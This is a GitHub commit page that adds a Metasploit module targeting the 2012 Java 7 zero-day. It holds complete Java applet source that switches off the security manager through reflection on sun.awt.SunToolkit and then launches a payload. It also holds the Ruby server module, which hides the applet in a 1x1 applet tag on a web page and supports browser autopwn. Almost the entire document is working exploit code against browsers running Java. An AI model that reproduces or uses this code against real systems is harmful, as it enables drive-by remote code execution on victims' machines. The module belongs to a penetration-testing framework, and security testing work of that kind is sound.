Skip to content
This repository
Browse code

Added java_jre17_exec

  • Loading branch information...
commit 52ca1083c22de7022baf7dca8a1756909f803341 1 parent b0661a3
authored
BIN  data/exploits/CVE-2012-XXXX/Exploit.class
Binary file not shown
75  external/source/exploits/CVE-2012-XXXX/Exploit.java
... ...
@@ -0,0 +1,75 @@
  1
+//
  2
+// CVE-2012-XXXX Java 0day
  3
+//
  4
+// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
  5
+
  6
+import java.applet.Applet;
  7
+import java.awt.Graphics;
  8
+import java.beans.Expression;
  9
+import java.beans.Statement;
  10
+import java.lang.reflect.Field;
  11
+import java.net.URL;
  12
+import java.security.*;
  13
+import java.security.cert.Certificate;
  14
+import metasploit.Payload;
  15
+
  16
+public class Exploit extends Applet
  17
+{
  18
+
  19
+    public Exploit()
  20
+    {
  21
+    }
  22
+
  23
+    public void disableSecurity()
  24
+        throws Throwable
  25
+    {
  26
+        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
  27
+        Permissions localPermissions = new Permissions();
  28
+        localPermissions.add(new AllPermission());
  29
+        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
  30
+        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
  31
+            localProtectionDomain
  32
+        });
  33
+        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
  34
+        localStatement.execute();
  35
+    }
  36
+
  37
+    private Class GetClass(String paramString)
  38
+        throws Throwable
  39
+    {
  40
+        Object arrayOfObject[] = new Object[1];
  41
+        arrayOfObject[0] = paramString;
  42
+        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
  43
+        localExpression.execute();
  44
+        return (Class)localExpression.getValue();
  45
+    }
  46
+
  47
+    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
  48
+        throws Throwable
  49
+    {
  50
+        Object arrayOfObject[] = new Object[2];
  51
+        arrayOfObject[0] = paramClass;
  52
+        arrayOfObject[1] = paramString;
  53
+        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
  54
+        localExpression.execute();
  55
+        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
  56
+    }
  57
+
  58
+    public void init()
  59
+    {
  60
+        try
  61
+        {
  62
+            disableSecurity();
  63
+			Payload.main(null);               
  64
+        }
  65
+        catch(Throwable localThrowable)
  66
+        {
  67
+            localThrowable.printStackTrace();
  68
+        }
  69
+    }
  70
+
  71
+    public void paint(Graphics paramGraphics)
  72
+    {
  73
+        paramGraphics.drawString("Loading", 50, 25);
  74
+    }
  75
+}
118  modules/exploits/multi/browser/java_jre17_exec.rb
... ...
@@ -0,0 +1,118 @@
  1
+##
  2
+# This file is part of the Metasploit Framework and may be subject to
  3
+# redistribution and commercial restrictions. Please see the Metasploit
  4
+# web site for more information on licensing and terms of use.
  5
+#   http://metasploit.com/
  6
+##
  7
+
  8
+require 'msf/core'
  9
+require 'rex'
  10
+
  11
+class Metasploit3 < Msf::Exploit::Remote
  12
+	Rank = ExcellentRanking
  13
+
  14
+	include Msf::Exploit::Remote::HttpServer::HTML
  15
+
  16
+	include Msf::Exploit::Remote::BrowserAutopwn
  17
+	autopwn_info({ :javascript => false })
  18
+
  19
+	def initialize( info = {} )
  20
+		super( update_info( info,
  21
+			'Name'          => 'Java 7 Applet Remote Code Execution',
  22
+			'Description'   => %q{
  23
+					This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary
  24
+				Java code outside the sandbox. This flaw is also being exploited in the wild, and there is
  25
+				no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome
  26
+				and	Firefox across different platforms.
  27
+			},
  28
+			'License'       => MSF_LICENSE,
  29
+			'Author'        =>
  30
+				[
  31
+					'Unknown', # Vulnerability Discovery
  32
+					'jduck', # metasploit module
  33
+					'sinn3r', # metasploit module
  34
+					'juan vazquez', # metasploit module
  35
+				],
  36
+			'References'    =>
  37
+				[
  38
+					#[ 'CVE', '' ],
  39
+					#[ 'OSVDB', '' ],
  40
+					[ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
  41
+					[ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ]
  42
+				],
  43
+			'Platform'      => [ 'java', 'win', 'linux' ],
  44
+			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
  45
+			'Targets'       =>
  46
+				[
  47
+					[ 'Generic (Java Payload)',
  48
+						{
  49
+							'Arch' => ARCH_JAVA,
  50
+						}
  51
+					],
  52
+					[ 'Windows Universal',
  53
+						{
  54
+							'Arch' => ARCH_X86,
  55
+							'Platform' => 'win'
  56
+						}
  57
+					],
  58
+					[ 'Linux x86',
  59
+						{
  60
+							'Arch' => ARCH_X86,
  61
+							'Platform' => 'linux'
  62
+						}
  63
+					]
  64
+				],
  65
+			'DefaultTarget'  => 0,
  66
+			'DisclosureDate' => 'Aug 26 2012'
  67
+			))
  68
+	end
  69
+
  70
+
  71
+	def on_request_uri( cli, request )
  72
+		if not request.uri.match(/\.jar$/i)
  73
+			if not request.uri.match(/\/$/)
  74
+				send_redirect(cli, get_resource() + '/', '')
  75
+				return
  76
+			end
  77
+
  78
+			print_status("#{self.name} handling request")
  79
+
  80
+			send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
  81
+			return
  82
+		end
  83
+
  84
+		paths = [
  85
+			[ "Exploit.class" ]
  86
+		]
  87
+
  88
+		p = regenerate_payload(cli)
  89
+
  90
+		jar  = p.encoded_jar
  91
+		paths.each do |path|
  92
+			1.upto(path.length - 1) do |idx|
  93
+				full = path[0,idx].join("/") + "/"
  94
+				if !(jar.entries.map{|e|e.name}.include?(full))
  95
+					jar.add_file(full, '')
  96
+				end
  97
+			end
  98
+			fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb")
  99
+			data = fd.read(fd.stat.size)
  100
+			jar.add_file(path.join("/"), data)
  101
+			fd.close
  102
+		end
  103
+
  104
+		print_status("Sending Applet.jar")
  105
+		send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
  106
+
  107
+		handler( cli )
  108
+	end
  109
+
  110
+	def generate_html
  111
+		html  = "<html><head></head>"
  112
+		html += "<body>"
  113
+		html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
  114
+		html += "</applet></body></html>"
  115
+		return html
  116
+	end
  117
+
  118
+end

0 notes on commit 52ca108

Please sign in to comment.
Something went wrong with that request. Please try again.